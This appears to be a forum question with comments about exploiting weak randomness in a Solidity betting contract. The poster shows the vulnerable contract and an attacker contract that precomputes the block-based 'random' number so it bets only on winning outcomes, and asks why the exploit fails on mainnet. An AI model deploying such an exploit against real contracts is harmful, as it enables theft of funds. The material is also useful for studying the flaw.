# Bad randomness exploitation

Tags: solidity, randomness

There is a contract with a betting function that calculates a random number and send you back a reward if winning. The betting function looks like:

```
function bet() public payable
    {
        if ((random()%2==1) && (msg.value == 1 ether))
        {
            if (!msg.sender.call.value(2 ether)())
                throw;
        }
    }
```

```
function random() view returns (uint8) {
          return uint8(uint256(keccak256(block.timestamp, block.difficulty))%256);
}
```

So if you send 1 ether and hit an odd number (50% chance) you will get back 2 ether. Now I want to precalculate the random number and bet if the number is odd.
I am trying that with a contract like this:

```
BadRandomBetContract private bet_;

function win() public payable onlyOwner {
        uint8 rnd = bet_.random();         // retrieve "random" number

        require(rnd % 2 == 1);             // odd number
        require(msg.value == 1 ether);

        bet_.bet.value(msg.value)();       // send 1 ether

        require(getBalance() == 2 ether);  // make sure we got 2 ether back, else revert
    }

function getBalance() public view returns(uint256) {
        return address(this).balance;
    }
```

When the winning contract sends 1 ether, transaction fails afterwards. Sending 1 ether at least means the requirement `require(rnd % 2 == 1);` passed. May it fail at this point `require(getBalance() == 2 ether);` because the balance does not get updated immediately? Shall I check `msg.value` in contracts fallback function?

The fail tx is from mainnet and the working one is from ropsten
[image]

[image]

Comment: Call `getBalance()` before and after, and make sure that the difference is 2 ether.

Comment: @goodvibration well thanks for answering. I can ensure the contract has 0 ether before and therefore should have exactly 2 ether after

Comment: Why don't you simply simulate the whole thing in Ganache and make sure that it works? You could really get your answer without even asking the question here.

Comment: i simulated it in ropsten 5 minutes ago and it works pretty well. Just does not work on mainnet apparently

Comment: For testing, you could use remix IDE as well.

Comment: I have tested it in Remix first, then on Ropsten. Both are working. See screenshots in original post that I have added